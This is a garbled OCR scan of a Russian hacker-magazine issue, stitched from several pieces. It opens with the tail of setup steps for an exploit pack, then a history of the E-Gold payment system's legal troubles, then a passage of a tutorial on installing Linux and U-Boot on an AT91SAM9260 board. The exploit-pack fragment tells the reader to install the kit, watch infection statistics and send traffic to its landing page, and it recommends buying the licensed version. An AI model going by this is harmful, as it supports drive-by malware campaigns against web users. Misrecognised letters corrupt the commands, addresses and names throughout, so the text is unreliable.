наш_сайт/зр1/_іпзба11 . рйр и запус- 
каем инсталл 

• После надписи " Іпзбаііабіоп 
біпізйеб Ріеазе беіебе іпзбаіі .рбр" 
удаляем _іпзба11 .рЪр 

И спокойно наблюдаем стату по загрузкам: 

Пббр: //наш_сайт/зр1/абшср.ркр 

Атрафикнаправляем вотна этотлинк: 

ііббр : / /наш_сайт/зр1/іпбех . рИр 

Р.З. Поверь, лицензионная версия связки стоит 
своих денег, а наличие поддержки и апдейтов 
окупит приобретение в самые короткие сроки, т 
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и так далее, далее, далее. Платежных систем в интернете 

насчитывается великое множество. Одни популярны на Западе, другие на Востоке, третьи пытаются усидеть на двух 
стульях сразу. Еще сравнительно недавно ни один список электронных платежных сервисов не обошелся бы без 
имени Е-боШ. Но сегодня это название стало чуть ли не синонимом слова «кидало во». Хочешь знать, почему попу- 
лярнейшая система пришла в столь плачевное состояние, а ее руководство едва неугодило за решетку? 



ЭКСКУРС В ИСТОРИЮ Предмет 
нашего сегодняшнего интереса — Е-Ѳоісі — 
может по праву гордиться не только былым 
статусом одной из крупнейших и наиболее 
популярных платежных систем, но и почет- 
ным званием одной из старейших из них. 
Придумали «электронное золото» на самой 
заре интернета — в 1996 году, и сделали это 
два весьма далеких от всякой «компьютер- 
щи ны» человека — Дуглас Джексон (Боидіаз 
^скзоп] и Барри Дауни (Ваггу К. Ооѵѵпеу]. 
«Папа» Е-ОоШ (Дуглас Джексон] по специ- 
альности — врач-онколог, притом некогда 
весьма успешный. Всвоевремяон не только 
получил высшее медицинское образование и 
успел послужить своей стране в рядах армии 
США, но после службы продолжил карьеру, 
возглавив отделение радиационной онко- 
логии в региональном медицинском центре 
Мельбурна (штат Флорида]. А немногим поз- 
же и вовсе открыл частную клинику Ріогісіа 
Опсоіоду. 



Казалось бы, преуспевающий врач, ни с того 
ни с сего ударившийся в электронную ком- 
мерцию, о которой тогда никто еще толком не 
помышлял — это весьма странно. Но жизнь 
полна сюрпризов. Дело втом, что Джексон 
всегда был неравнодушен кфинансам, а, 
занявшись собственным бизнесом, ушел в 
них с головой. Он предпочитал знать, с чем 
имеет дело и «как это работает». И в 1995-м 
у него родилась идея о создании удаленной 
платежной системы, которой нетребовался 
бы промежуточный финансовый институт. 
Ктаким размышлениям доктора Джексона 
подтолкнуло частное исследование о денеж- 
ном влиянии на кредитный и промышленный 
цикл. 

Поняв, что на руках у него — готовая, ра- 
ботающая схема и не желая откладывать 
реализацию придуманного на абстрактное 
«потом», Джексон довольно быстро сумел 
найти средства и возможности для вопло- 
щения своей идеи в жизнь. Е-ВоШ заработал 



уже в 1 996-м году, в почти свободной тогда 
нише рынка. Результат не заставил себя 
ждать. Джексон действительно не ошибся — 
уже в 1 998-м он был вынужден отказаться от 
продолжения медицинской деятельности в 
пользу стремительно набирающей обороты 
компании СоШ & Зііѵег Резегѵе (0&5П) Іпс. 
Дуглас передал свою долю в Ріогісіа Опсоіоду 
партнерам и полностью сосредоточился на 
новой работе. 

Соучредителем С&ЗР и партнером Джексона 
стал Барри Дауни — юрист по образованию, 
тоже вполне успешный в своем деле. Специ- 
алист в области права, успевший побывать 
членом американского Верховного суда, а 
также автор и соавтор ряда юридических тру- 
дов, с готовностью присоединился к медику, 
взвалив на себя должности секретаря, вице- 
президента и директора компании. 

ЗОЛОТОЙ ФОНД Пора вкратце рас- 
сказать о принципах работы Е-ОоШ. Вполне 
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ТАБЛИЦАТЕКУЩЕИ СТОИМОСТИ «ЭЛЕКТРОННЫХ МЕТАЛЛОВ» 



вероятно, что они тебе незнакомы — компа- 
ния растеряла свою популярность и начала 
«тонуть» еще в самом начале XXI столетия. 
Многие попросту ее не застали. 

В отличие от привычных для нас сегодня 
электронных платежных систем, Е-боШ не 
использует денежных единиц. Вместо них 
все строится на самых настоящих драгме- 
таллах — то есть, золоте, серебре, платине 
и палладии. Физические запасы компании 
— ее Золотой фонд — хранятся в слитках 
(почти 2.5 тонны одного только золота !], 
в надежных банковских хранилищах, 
подальше от физических, политических и 
других рисков. Так что, при расчетах через 
Е-боШ счет идет не на условные единицы, 
а на тройские унции (ХАІІ) и граммы (АІІ6). 
Это позволяет забыть о колебаниях курсов 
валют — стоимость ценных металлов на 
мировых рынках вещь гораздо более пос- 
тоянная. 

С юридической точки зрения получалось, что 
люди обмениваются расписками о размеще- 
нии определенного количества драгметалла 
на хранение в компании Е-Ѳоісі Цб. (почти 
все полномочия по управлению системой 
электронных платежей были переданы 
компании Е-боШ НФ., зарегистрированной в 
Вест-Индии]. 

Система специально строиласьтаким 
образом, чтобы не зависеть от финансовых 
рынков, сама компания не обладала никакой 
национальной валютой и не имела счетов в 
банках. Плюс ко всему, средства клиентов 
являлись активами, находящимися на хра- 
нении, а, значит, не могли быть предметом 
судебных притязаний. 

С помощью «электронного золота» можно 
было делать переводы другим пользова- 
телям, принимать платежи на свой счет, 
расплачиваться в интернет-магазинах и т.д. 
Ввод денег в систему осуществлялся обыч- 
ными методами — банковским платежом, 
переводом от другого пользователя или же 



через обменный пункт электронных валют. С 
выводом денег все тоже выглядело при- 
вычно: его можно было осуществить через 
любой электронный обменник, банковский 
чек или перевод, а также, теоретически, даже 
получить на руки свой слиток драгоценного 
металла. 

Сложно не оценить красоту и изящество за- 
думки Джексона, однако их оказалось недо- 
статочно. Хоть и говорят, что «все гениальное 
— просто», простота и гениальность сыграли 
скорее «против», чем «за» Е-Ооіб. 

ВХОЖДЕНИЕ В ШТОПОРУспехи 

платежной системы и ее стремитель- 
ный рост не остались незамеченными. С 
увеличением числа зарегистрированных 
пользователей (к началу 2003 года их был 
уже миллион), у компании появлялись 
конкуренты, завистники и люди, недоволь- 
ные ее деятельностью. Основная проблема 
заключалась в том, что Е-Ооіб фактически 
не требовал для регистрации никаких 
удостоверений личности. Данные, введен- 
ные пользователем, никак не проверялись, 
не существовало и лимита на количество 
аккаунтов, открытых на одного человека. 
Единственным «строгим требованием» был 
адрес электронной почты. Получалось, что 
сервис легкодоступен, прост (все операции 
совершались прямо в браузере) и практи- 
чески анонимен. Ктомуже, отменить тран- 
закцию в Е-Ооіб былоделом проблемным, 
если не сказать, малореальным. Все это, 
само собой, привлекло внимание не только 
простых пользователей, но и аферистов 
всех мастей — от банальных кидал до 
кардеров и, предположительно, торговцев 
детским порно. Вдобавок, у Е-Ооіб на руках 
не было необходимых по за ко ну лицензий 
для осуществления денежных переводов. 
Алицензии отсутствовали в видутого, что 
расписки, имеющие хождение в системе, 
оставались лишь расписками, и, кактако- 



вые, деньги в ней не циркулировали. Во 
всяком случае, именно так звучала позиция 
доктора Джексона. 

Все это, разумеется, привело к повышен- 
ному вниманию со стороны правительства, 
но ситуация вокруг Е-ОоШ развивалась 
весьма неспешно, вплоть до 9 сентяб- 
ря 2001 года. А вот после падения ба- 
шен-бл изнецов в Штатах было принято 
множество мер, направленных на борьбу с 
терроризмом, втом числе, широко извест- 
ные «Акт о национальной безопасности» 
и «Патриотический акт». По сути, немало 
законоввтовремя попросту протолкнули 
«под шумок», так что узаконенная про- 
слушка телефонных разговоров и прочие, 
не слишком приятные, вещи стали реаль- 
ностью. Само собой, и для платежной сис- 
темы, которая, по мнению правительства и 
недоброжелателей, имевших большой вес 
в политических и финансовых структурах, 
«крышевала» мошенников и порнографов, 
пришло время или менять свою политику, 
или же отправляться под суд. 

Как ни странно, Е-ОоШ не горел желанием 
меняться. Неизвестно, насколько правди- 
вы слухи отом, что руководство компании 
прекрасно знало о проходящих через их 
систему потоках «грязных денег» и имело с 
них немалую прибыль — но тогда говорили 
и писали об этом много. Хотя суду так и не 
удалось доказать вину владельцев системы, 
однозначно сказать «было» или «не было» — 
невозможно. 

Однако мы забегаем вперед, а тогда, в начале 
2000-х, разрешить вопрос миром не вышло. 
Компания не хотела, немо гл а или не считала 
нужным вводить более серьезные способы 
идентификации пользователей и с большей 
ответственностью подходить к контролю над 
транзакциями. Последующие годы преврати- 
лись для Е-ОоШ в череду судебных разбира- 
тельств. И за это время пресса успела «похо- 
ронить» компанию не меньше десятка раз. 
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Непосредственные действия «по борьбе с 
Е-0ОІСІ» были развернуты только в 2004-2005 
годах. Г отовились к ним основательно и дав- 
но, так что обвинили «электронное золото» 
практически во всех смертных грехах сразу. 
Если точнее, вменили в вину, что, являясь 
юридическим лицом, компания занимается 
денежными транзакциями без соответст- 
вующей на то лицензии; фактически 
способствует развитию противозакон- 
ной деятельности финансовых пирамид, 
киберпреступников и иже с ними, оказывая 
им банковские услуги; а также отмывает 
деньги порнографов (в том числе, детских]. 
Расчехлив любимые пугала — терроризм и 
детское порно, к 2005-му году правительст- 
во окончательно вышло на «тропу войны». 
Офисы компании ОоШ&ЗіІѵег Везегѵе, 

I пс. подверглись обыску, а банковские 
счета были заморожены. Власти впервые 
попытались доказать в суде, что в системе 
циркулируют ворованные деньги. Впрочем, 
из этого ничего не вышло. В 2006-м суд вы- 
нес оправдательный приговор, по причине 
отсутствия доказательств вины Е-ОоШ. 

Тогда компания, по сути, отделалась легким 
испугом, и многие рассчитывали, что после 
этого «инцидента» руководство Е-ОоШ 
образумится и начнет принимать меры и 
затягивать гайки. Но Джексон, Дауни и их 
коллеги решили иначе — перемен в системе 
не последовало. 

Параллельно с судебным процессом, репута- 
цию Е-ОоШ портила пресса. То в одном, то в 
другом авторитетном ІТ-издании всплывала 
информация о незаконных операциях, прово- 
дящихся через Е-боШ. 

Например, ВизіпеззѴѴеек сообщал, что 
крупная международная команда кардеров 
ЗЬасІоѵѵСгеѵѵ активно использует «элект- 
ронное золото», перекачивая через него от 
$40.000 до $1 00.000 в неделю. Интересно, 
что в это же самое время официальная 
статистика компании утверждала, что по 
данным на апрель 2006-го, только у двадца- 
ти четырех клиентов на счету было свыше 
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Основная проблема заключалась в том, 
что Е-боШ фактически не требовал для 
регистрации никакихудостоверений 
личности. 



1 0 килограммов золота (что примерно равно 
$200.000]. О том, что один человек может 
иметь и 5, и 1 5 депозитов статистика тактич- 
но умалчивала. 

В ответ на эти, в общем-то, логичные, 
выпады Джексон публично заявлял, что все 
операции в его системе легальны, а нажи- 
тые незаконным путем средства — проблема 
никак не компании Е-ОоШ, а людей, которые 
эти деньги крадут. Он говорил, что другие 
платежные системы не менее виновны «в 
отмывании денег» и советовал властям 
обратить внимание на тот же Рау Ра I. 

А также Дуглас не уставал напоминать 
прессе и сильным мира сего о том, что 
Е-ОоШ всегда охотно сотрудничает с 
правоохранительными органами, помо- 
гая в расследованиях ФБР, федеральной 
торговой комиссии, внутренней налоговой 
службе, управлению по борьбе с наркотика- 
ми и так далее. 

В самом деле, в Е-ОоШ даже начали уст- 



раивать демонстрационно- показательные 
облавы, в ходе которых аккаунты блокиро- 
вались тысячами, а сам основатель компа- 
нии помогал властям в обучении борцов с 
кибер-преступностью. Но и этого оказалось 
недостаточно. 

Еще один тяжелый удар системе нанес аукци- 
он еВау, в 2006 году полностью перешедший 
на РауРаІ и отказавшийся отуслуг других 
сервисов электронных платежей. И пускай 
Е-ОоШ была далеко не единственной «остав- 
ленной за бортом» системой, на е Вау «элек- 
тронное золото» было упомянуто отдельной 
строкой. Правила аукциона подчеркивали, 
что использование Е-ОоШ карается немед- 
ленным закрытием аккаунта продавца (доба- 
вим, что аналогичную меру можно схлопотать 
отнюдь не только за использование Е-Оо Ш]. 

ЗАБВЕНИЕ Несмотря на то, что на про- 
тяжении всей статьи речь о Е-ОоШ идет в 
прошедшем времени, сегодня компания и 
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киберпреступников и иже с ними, оказывая 
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что в это же самое время официальная 
статистика компании утверждала, что по 
данным на апрель 2006-го, только у двадца- 
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«ОСНОВНАЯ ПРОБЛЕМА ЗАКЛЮЧА- 
ЛАСЬ В ТОМ, ЧТО Е-ѲОЮ ФАКТИ- 
ЧЕСКИ НЕ ТРЕБОВАЛ ДЛЯ РЕГИСТ- 
РАЦИИ НИКАКИХУДОСТОВЕРЕНИЙ 
ЛИЧНОСТИ.» 
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сама платежная система все еще живы. 

При ЭТОМ: 

• создание новых аккаунтов «временно 
заморожено»; 

• вывести деньги с уже имеющегося счета 
можно лишь с огромным трудом. 

Ни один человек в здравом уме не станет 
расплачиваться через Е-Ѳоісі , но «электрон- 
ное золото» не желает идти ко дну. Затяжная 
агония, начавшаяся в середине десятилетия, 
продолжается до сих пор. 

После первой попытки «штурма» власти 
не оставили Е-ОоШ в покое, и в 2007 году 
выдвинули против 6&5В новый иск со ста- 
рыми претензиями. Ореол крайне сомни- 
тельной славы, к этому моменту уже плотно 
окруживший систему, начал отпугивать 
рядовых пользователей. Зато, похоже, он 
ничуть не тревожил аферистов — новые 
аккаунты в системе плодились со скоростью 
примерно 95тысяч в месяц. Интерес к Е- 
ѲоШ снижался — из-за этого золотой фонд 
компании, ранее составлявший почти 3.5 
тонны золота, за год сократился почти на 
треть. К середине 2008-го от него осталось 
лишь 2.420 кг. 

В итоге, летом 2008 года, после предва- 
рительных слушаний, руководство Е-Ѳоісі 
решило признать свою вину. Очевидно, это 
было продуманное решение —учитывая 
тяжесть выдвинутых обвинений, вынесен- 
ный в конце 2008 года приговор оказался 
слишком уж мягким. Дугласа Джексона, его 
брата Рейда и Барри Дауни приговорили 
к 3 годам условно (включая пол года под 
домашним арестом и электронным наблю- 
дением), а также — кЗООчасам обществен- 
ных работ. Всехтроих обложили штрафом: 



Джексона обязали раскошелиться на $200 
(это не опечатка — двести зеленых бумаж- 
ных денег), а Дауни и Рейд Джексона — на 
$2.500 каждого. Но что самое любопытное 
— деятельность компании суд также не 
пресек. Вместо этого судья Розмари Кольер 
постановила, что ѲоШ & Зііѵег Резегѵе 
должны оформить все необходимые для 
работы лицензии и привести регистрацию 
новых аккаунтов в системе к нормам, пре- 
дусмотренным законом. 

Последнее, впрочем, было сделано еще за 
полгода до окончания процесса. Видимо, 
поняв, что во второй раз сухими из воды им 
выйти неудастся, в Е-ОоШ, наконец, начали 
действовать на опережение — например, 
стали требовать от пользователей нормаль- 
ную контактную информацию, регистраци- 
онный номер налогоплательщика, а также 
указание места жительства и даты рождения. 
Плюс, наконец, запретили регистрировать 
несколько аккаунтов на одного человека и 
внесли в пользовательское соглашение ряд 
изменений, призванных подпортить жизнь 
кибермошенникам. 

Однако вряд ли можно сказать, что все снова 
закончилось хорошо. Хотя ко мпания фор- 
мально до сихпорне закрыта, ее репутация 
безнадежно испорчена. Регистрация новых 
пользователей заморожена, процесс полу- 
чения лицензий, очевидно, затягивается, а 
довериедавно подорвано. 

В 2008-м масла в огонь подлили и постоян- 
ные ООоО-атаки на Е-ОоШ, и пущенная тогда 
же «утка», гласившая, что систему якобы за- 
крыли, Е-ОоШ — банкрот итеперьне сможет 
расплатиться со своими клиентами. Из-за 
последнего сообщения пользователи (как, 



видимо, и ожидалось) побежали, словно 
крысы стонущего корабля, и спешно броси- 
лись выводить со своих счетов средства, что 
тоже не улучшило общего положения дел. 
Раздутая вокруг Е-ѲоШ паника больно уда- 
рила по курсу «электронного золота» и по- 
родила сумасшедшие проценты комиссии. 
Если сегодня попытаться вывести средст- 
ва со счета Е-ѲоШ, придется попотеть, 
разыскивая обменник и, даже если таковой 
найдется, — придется заплатить порядка 
70% комиссии. 

Что будет с Е-ОоШ дальше, сказать слож- 
но. Несмотря на критическое положение, 
доктор Джексон не унывает. Он охотно 
рассказывает всем, кто готов его слу- 
шать, отом, каким модификациям сейчас 
подвергается Е-ОоШ, и о ее будущих 
надежности и удобстве. Но техничес- 
кая сторона дела, это только полбеды. 
Компания пока даже не пытается «по- 
вернуться к пользователям лицом» и не 
предпринимает попыток хоть как-то реа- 
билитироваться в глазах общественнос- 
ти. Возникает ощущение, что руководс- 
тву попросту наплевать на промоушен 
и собственный облик. Чего стоит один 
только официальный сайт компании, 
вызывающий чувство острой ностальгии 
по 90-м и молодому интернету. 

Впрочем, Е-ОоШ на протяжении всей 
ее 13-летней истории всегда везло 
и, возможно, повезетеще раз. Шанс, 
что компания восстанет из пепла и 
предстанет перед нами в новом свете, 
все же, отличен от нуля, тем более что 
трения с властями, похоже, наконец-то, 
у р е гул и р о в а н ы т 
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ЕВГЕНИЙ «ЛМ» ЗОБНИН 

/20ВЫШІВ6МАИ.С0М/ 



Е+Негпеі: 



ЧЕМПИОН 
В ЛЕГКОМ ВЕСЕ 



МАМЕ:- 256 М 



Практическое руководство по поселению 
61411/Ыпих на микроконтроллере 

Цель проста — научиться ставить ОС на базе І_іпих на что-то, от- 
личное от вездесущей архитектуры I В М РС. Полагаю, у тебя есть 
такоеустройство, бывшее совсем недавно маршрутизатором 
или каким-нибудь промышленным компьютером. Либо ты потра- 
тился и купил полноценный одноплатник, чтобы использовать его 
в качестве отдельного файл-сервера. Для таких функций писать 
с нуля прошивку не имеет смысла, а вот поставить специальный 
дистрибутив І_іпих — самоето! 



АПЕРА 



г К0К5ЕТ — НЮБ БЕЗ ЛОЖ- 
НЫХ СРАБАТЫВАНИЙ 

В предыдущем номере, напомню, была освеще- 
на теоретическая сторона вопроса и проведен 
обзор популярных архитектур и дистрибутивов 
для встраиваемыхустройств. Сегодня займемся 
собственноустановкой Линукса. 

Понятно, что втвоем случае может быть совер- 
шенно другая плата с другим контроллером. 

Но программирование встраиваемыхустройств 
всегда проходит по одним и тем же шагам, поэ- 
тому, научившись все делать на моем примере, 
нетрудно перенести полученный опытнатвой 
девайс, чуток подправив алгоритм. Отличия 
будут, но чаще всего — несущественные, при- 
чем всетонкости прошивки отдельно взятого 
устройства подробно описываются в ОаіазЬееі 
к контроллеру и на сайте производителя. 

Также, для успешного завершения миссии, 
неплохо бы иметь базовыезнания по процессу 
загрузки Ыпихизнать, что есть«периферия», 
«контроллер», «файловая система». Перед тем, 
как что-либо прошивать, получи максимум ин- 



формации о подопытном устройстве: перепиши 
маркировки микросхем, узнай объем итипы 
памяти, почитай официальный сайт и форумы. 
Наверняка, ты не первый, кто устанавливает 
Ыпихна подобный девайс — пучиться лучше 
на чужих ошибках, чем на своих. 

Делать все будем по шагам. И помни, ситуация 
не является безвыходной до тех пор, пока изус- 
тройства не пойдет дым:]. 

и КАПРИЗНЫЙ МОНСТР 

У меня есть промышленный компьютер 
зЬ27спс1 , при проектировании которого был 
взят за основу АітеГовский отладочный набор 
АТ915АМ9260-ЕК и добавлено несколько узлов 
типа ПЛИС (программируемые логические ин- 
тегральные схемы] от компании АНега, а также 
пара параллельных портов. Вотего ключевые 
компоненты: 

• Микроконтроллер АСшеІ АТ913АМ9260 
в корпусе Р<2РР 

• Оперативная память: 64 Мб ЗБКАМ 



(две микросхемы по 32 Мб шириной 16 
бит) 

• ЫАШ-ЕІазй: 256 Мб 

• БабаЕІазЬ. на ЗРІ -интерфейсе Абшеі 
АТ45БВ041В: 1 Мб 

• Микросхема физического уровня 
ЕЩтегпеб , совместимая с ІЕЕЕ 802.3: 
Місгеі К328041ТЬ 

• На плату также выведены ЮЗВ-хост 
и БВСІІ- интерфейс 

Надо помнить, что АТ915АМ9260уже не совсем 
микроконтроллер втом смысле, который мы 
привыкли вкладывать в это понятие. Ведь внут- 
риунего нуоченьмного всякой разнообразной 
периферии, начиная с ЦАПа для вывода звука 
и заканчивая контроллерами локалки (ЕМАС — 
уровень Еібегпеі;] и ЕІазЬ-памяти. В этом смыс- 
ле 9260 — самый, что ни на есть, компьютер-на- 
кристалле. Но с другой стороны, оперативной 
памяти у него внутри — всего 8 Кб, из которых 
тебе доступ но только 4, а энергонезависимой 
там нет вообще. Этот недостаток приходится 
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компенсировать напайкой внешней памяти. 

И всеже, как за пускать та ко го капризного 
монстра? Тем, кто не читал мою прошлую ста- 
тью, напомню. В самом начале работы процес- 
сора первым делом стартует встроенный в РОМ 
загрузчик. У того хватает интеллекта только 
на то, чтобы высосать 4 Кб (одну страницу] кода 
из микросхемы Оаіа- или N АЫ О-бІазЬ памяти, 
скопировать их во внутреннюю оперативку 
(которой как раз 4 Кб] и передать на нее управ- 
ление. В эти 4 Кб мы должны впихнуть код ини- 
циализации большой и взрослой оперативки 
ВОРАМ, определить напаянные микросхемы 
РІазЬ-памяти, скопировать о^уда остальной 
код в уже работающую оперативку и передать 
на него управление. С этого момента уже мож- 
но говорить отом, что устройство запущено. 

В общем, это нетакстрашно (мы не в рубрике 
Собіпд), и наша задача сведется ккомпиляции 
уже готовых исходников (да и то не всегда]. 
Общаться сЛинуксом первое время будем 
через та к называемый отладочный интерфейс 
0В01І. Сточки зрения использования, это 
обыкновенный ЮАРТ- порт с обрезанными воз- 
можностями. На моей плате он выведен через 



Р5-232-интерфейсную микросхему на 9-пино- 
вый СОМ-разъем, который уже подключается 
к компу. 

Что загрузчики, что Линукс поумолчанию 
используюттакие параметры порта: 

Скорость: 115200 
Данные: 8 ЪіВз 
Четность: Нет 
Стоп -биты: 1 
Контроль: нет 

Вбей эти параметры в своютерминальную 
программу на стороне РС. 

Не лезь на рожон. Заставьустройство 
запуститься хотя бы с дефолтовыми ядром 
и файловой системой, идущими в комплекте 
с отладочной платой, а потомуже на заведомо 
рабочем Линуксе затачивай девайс под свои 
нужды. Поехали. 

а ЗАЛ И В КА 

Какуже неоднократно говорилось, АТ915АМ9, 
когда не находит подходящих прошивок по ну- 
левым адресам Оаіа- и ЫДЫВ-флеш памяти, 



запускаетживущую в РОМ программу БАМ Вооі 
Адепі (5АМ-ВА]. На устройстве САМ-Бу можно 
вызвать закороткой особого пина (смотри 
документацию) или просто бросанием 5РІ Біаѵе 
Оиіриі ножки на землю. Подключаем девайс 
кІІБВ-порту и проверяем, какой определился: 

$ ІзизЪ 

Виз 002 Беѵісе 060: ІБ ОЗеЬ: 

6124 АСтеІ Согр. аС91заш 8АМВА 
ЪооСІоасІег 

Далее, по ссылке ѵѵѵѵѵѵ.[іпих45ат.огдЛѵѵікі/ 
ЫпА/іеѵу/1_іпих45АМ/5о11ѵѵагеТоо[5 . качаем 
софт для прошивки. Оттуда же узнаем наши 
следующие шаги: 

# шоЛргоЬе изЬзегіаІ ѵеп<іог=0х03еЬ 
ргоЛисЦ=0х6124 

Что ж, у нас есть виртуальный СОМ-порт, к ко- 
торому подключаемся софт-программатором. 
Бинарникпосле распаковки называется зат- 
Ьа_сбс_2.8.1іпих_01 , его и вызываем. При за- 
просеуказываем порт/сІеѵ/ЛуІІБВО и плату 
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АТ915АМ9260-ЕК. Теперь, выбирая вкладками 
нужную периферию, можнозаливать код. Неза- 
бывай вызыватьскриптытипа ЕпаЫе РІазЬ 
и нажимать ЕхесіТе, иначе при попытке обра- 
титься кнеинициализированной микросхеме 
устройство повиснет вместе с программатором. 
Первичный 4-килобайтный загрузчиклучше 
заливать через скриптБепсІ Вооі Рііе, а все 
остальное — через диалог посередине окна 
и указание адреса вручную. Если загрузчик ру- 
гается и не хочет копировать данные, убедись, 
что адрес кратен размеру блока (0x1 0000 байт 
для ЫАЫБ). Возможно, тебе еще понадобится 
компилятор агт-еіі-дсс п од архитектуру АП М. 
Берется он с сайта пиагт.сот . После этого все 
должно быть готово к прошивке и отладке. 

нЗАГРУЗЧИК ПЕРВОГО 
УРОВНЯ, АТ91 В00Т5ТКАР 

Качаем его по адресу ѵѵѵѵѵѵ.ІіпихДзат.огдЛѵѵ 
ікі/Ьіп/ѵіеѵѵ/ипих45АМ/АТ91 Вооізігар . Если 
твоя микросхема БаЫІазб живет на СЬірБеІесІ: 

1 , то сразу можешь взять скомпилированный 
бинарник, иначе придется мучить исходники. 
Распаковываем. Следуя мануалу потомуже 
адресу, выбираем нужную нам конфигура- 
цию путем использования соответствующего 
Макебіе. Имея 8-мегабитный БаЫІазЬ на пла- 
те, загрузчики я запихивал именнотуда, а ядро 
с ФС — уже на 256-мегабайтный МАЫБ-ЕІазЬ. 
Значит, в моем случае проект компилируется 
вот та К: 

$ ссі Ьоагс1/аС91зат9260ек/с1аЦа:Е:1азЪ. 

$ таке СКОЗЗ_СОМРІЬЕ=агт-е1Е - 

Загрузчик простенький, вето кодах не составит 
труда разобраться, но следи, чтобы размер ито- 
гового бинарника не превышал 4096 байт. 

Мне еще пришлось раскомментировать «драй- 
вер» моей БаЫІазЬ-микросхемы АТ45БВ041 В 
в файле сІгіѵег/сІаЫІазЬ.с. Функция сЛЧпіІ: 
не совпадала сустановленной на референсном 
отладочном наборе. Она была подложена в про- 
ект, просто закомментирована для уменьшения 
размера. 



Чтобы быть уверенным, чтозагрузчикчестно 
отрабатываетсвою часть и передаетуправление 
дальше, раскомментируй строчку «#ипсІе1 : СРѲ_ 
БЕВБ6» в заголовочном файле а!:91 за т9260ек.Ь. 
Тогда за грузчик сможет плеваться сообщениями 
на отладочный порт, и, если что-то не заработает, 
ты найдешь проблему быстрее. 

После компиляции заливай получившийся . Ьі п 
в выбранныйтобой Еіазб через БАМ-ВАВооІ, 
используя скрипт«5епсІ Вооі Еііе». Перезагру- 
жай устройство и смотри на отладочные сооб- 
щения, чтобы бытьуверенным в этом этапе. 

нЗАГРУЗЧИК ВТОРОГО 

уровня, и-воот 

Таковым его можно назвать лишь с натяж- 
кой. Этот монстр разве что втетрис не играет. 
Умеет за гружатьОСь откуда угодно, в том 
числен посети (ТЕТРи ВООТР], тестировать 
и копировать РАМ и ЕІазЬ память. Крометого, 
поддерживает простые скрипты. В общем, за- 
бираем с прилагаемого к журналу диска архив 
с исходниками и-ЬооТ— 1 .3.4.1а г. Ьі2, распако- 
вываем, добавляем экспериментальный патч 
и-ЬооТ— 1 .3.4-ехр.сШ и собираем: 

$ таке аС91зат92 60ек_йака^1аз]т_сз0_ 
сопТід 

$ таке СК088_С0МРІЬЕ=агт-е1І - 

Теперьопределимся, куда заливать и-ЬооЕЬіп. 
Если ты смотрел исходники загрузчика первого 
уровня (4-килобайтный ВооІзІгар),то могзаме- 
тить несколько л юбопытныхдефа й нов: 

$1е55 а191зат9260ек. И 

МеНіпе ІМС_АВВКЕ58 0x84 00/* Ітаде 
АсМгезз іп ВакаЕІазЪ. */ 
ісіеііпе ІМС_8І2Е 0x33900/* Ітаде 
Зіге іп ВаВаЕІазЪ. */ 

Меііпе ЦШР_АВВК 0х23Е00000/* 

Еіпаі Цитр АсМгезз */ 

Это именно те адреса, откуда Вооізітар берет 
прошивку (в нашем случае, ІІ-Вооі] и куда ее 
копирует. Если ты не менял эти дефайны.то лей 



образ в БаЫІазб поадресу 0x8400. Такназыва- 
емый Епѵігоптепі, а, по сути, конфигурацион- 
ный блокзагрузчика, тоже должен где-то жить. 
Его место — между самим ІІ-ВооПом и первич- 
ным загрузчиком по адресу 0x4200 (смотри / 
і псіисіе/ сопбід5/а1;91 зат9д20ек. И), поэтому 
в будущем нетрогай этот блок, если не хочешь 
настраивать все заново. 

Перегружаемся и смотрим результаты. ІІ-ЬооІ 
должен определить имеющуюся память, обло- 
маться с загрузкой ядра и вывалиться в команд- 
ную строку. Пиши Ьеір и изучай возможности. 

нЯДРОШУХ 

Поигравшисьс командной строкой ІІ-ВооІ, 
переходи ксобственно загрузке ядра. 

Откуда его брать? По адресу ѵѵѵѵѵѵ.[іпих45ат.огд 
Аѵѵікі/Ып/ѵіеѵѵ/ипих45АМ/ипихКегпе[ можно 
скачать прекомпилированное ядро, заточенное 
под отладочную плату. Предлагаю начать имен- 
но с него.таконо гарантировано работает. 
Ядроу меняживетв ЫАМБ-ЕІазЬ памяти поаде- 
су 0x42000. Этот адрес посоветовал мануал, хотя 
я имел полное право грузить его куда угодно; 
надо только следить, чтобы оно не пересекалось 
сдругими данными. 

Итак, берем ядро посвежее (2.6.27), на будущее 
скачиваем стой же странички исходники с пат- 
чем и, вызвав 5АМ-ВА Вооі, заливаем в вы- 
бранный флеш по выбранному адресу. После 
перезагрузки снова оказываемся в командной 
строке Б-ВооЕ Пишемтакие команды: 

ІІ-Воок> зекепѵ ЪооВстсІ пЪоок 

0x22000000 0x0 0x42 0 00 \; ЪооВт 

Ц-ВооВ> заѵеепѵ 

Опция зеіепѵ задает переменные окружения. 
ВооістсІ — особая переменная, через нее 
описывают команды (в данном случае — «пбооі: 
0x22000000 0x0 0x42000; Ьооіт»), которые 
требуется выполнить после 3-секундного тай- 
маута в начале загрузки Б-ВооЕ Команда пбооі: 
копирует да иные из ІЧАІЧБ-ЕІазб поуказанному 
адресу, а Ьооіпп — запускает программу, упа- 
кованную утилитой ткі гладе (смотри дальше). 



► 080 
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ДОЛГО И НУДНО ЗАЛИВАЮ ФС ЧЕРЕЗ 
5АМ-ВАВ00Т 



Если же клавиша была нажата, и ты оказался в командной 
строке, то дефолтовая загрузка выполняется командой ЬооЕ 
В общем, если все сделано правильно, то сначала поя- 
вится небольшая статистика о ядре, а потом начнется его 
распаковка (строчка «ІІпсотргеззіпд Ыпих»]. Затем должно 
завестись само ядро, радостно возвещая об этом множест- 
вом сообщений на отладочный порт. Читай их внимательно, 
там сообщается обудачных и не оченьфактах подключения 
периферии. В дальнейшем это может помочь при переком- 



СОБИРАЕМ ЕМОЕВІАЫ 



йв» іШЪкшт і : ЬлйрІ С иц и і жл и* пт т тітлгі 



пиляции и заточке. 

Кактолько ядро выскажет все, что думает об окружающем 
его мире, произойдет самое логичное, что может случиться 
— оно запаникует! Файловой системы ведь нет. Это нормаль- 
но,— прикручиванием ФС мы займемся чуть позже. 
Скомпилировать ядро, если в этом будет необходимость, 
также несложно. Качаем ванильное ядро, а с ІіпихДзат.огд 
утягиваем патч для платы и дефолтный конфиг. 

Возможно, патч придется править, если твой девайс 
отличается от отладочного набора (иначе часть периферии 
не запустится). 

Накладывание патча 

$ ссі Ііпих-2 .6.27/ 

$ мдеС тахіт. огд . 2а/АТ91КМ92 00 /2 .6/2. 6. 27- ак 
91. раСсЪ. дг 

$ гсаС 2 . 6 .хх-аС91 .раксЬ. дг | раРсЪ. -рі 

Конфигурирование и компиляция 

$ мдеР ілплплг. 1іпих4зат. огд/Рмікі /риЪ/Ьіпих45АМ 
